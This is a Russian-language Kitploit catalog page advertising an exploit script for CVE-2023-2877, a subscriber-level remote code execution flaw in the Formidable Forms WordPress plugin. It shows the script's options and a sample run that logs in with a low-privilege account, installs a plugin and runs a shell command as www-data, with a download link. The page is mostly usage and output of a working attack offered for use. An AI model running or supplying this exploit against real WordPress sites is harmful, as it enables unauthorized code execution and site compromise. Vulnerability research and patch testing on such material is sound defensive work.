Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/randomrobbiebf/cve-2023-2877
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubrandomrobbiebf/cve-2023-2877

CVE-2023-2877

Formidable Forms < 6.3.1 - Subscriber+ Удаленное выполнение кода

Репозиторий
2213 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-2877

Formidable Forms < 6.3.1 - Удаленное выполнение кода для подписчиков и выше

Использование

root@kitploit:~
usage: CVE-2023-2877.py [-h] -w URL -u USERNAME -p PASSWORD [-pl PLUGIN] [-c CMD]

CVE-2023-2877 - Formidable Forms < 6.3.1 - Скрипт удаленного выполнения кода для подписчиков и выше

options:
  -h, --help            показать это справочное сообщение и выйти
  -w URL, --url URL     URL сайта WordPress
  -u USERNAME, --username USERNAME
                        Имя пользователя WordPress
  -p PASSWORD, --password PASSWORD
                        Пароль WordPress
  -pl PLUGIN, --plugin PLUGIN
                        Другой плагин для установки, например mstore-api.3.9.0.zip
  -c CMD, --cmd CMD     Значение команды

Пример

root@kitploit:~
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1
Успешный вход.
Токен извлечен: 15157e0f4740e9d1bbccdc5edbef1292943daf7d064637de094b2af2e9364ee9262f985d41d1658d90f1387800d09e8269a93f6397333e61c13240ababb4648d
Плагин успешно установлен.
Теперь запустите эксплойт с --cmd / -c и командой.
root@kitploit:~
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1 -c id
Данные:
[['uid=33(www-data) gid=33(www-data) groups=33(www-data)']]

Предупреждение

НЕОБХОДИМО УДАЛИТЬ УЯЗВИМЫЙ ПЛАГИН User Post Gallery, так как он не имеет аутентификации!

Скачать инструмент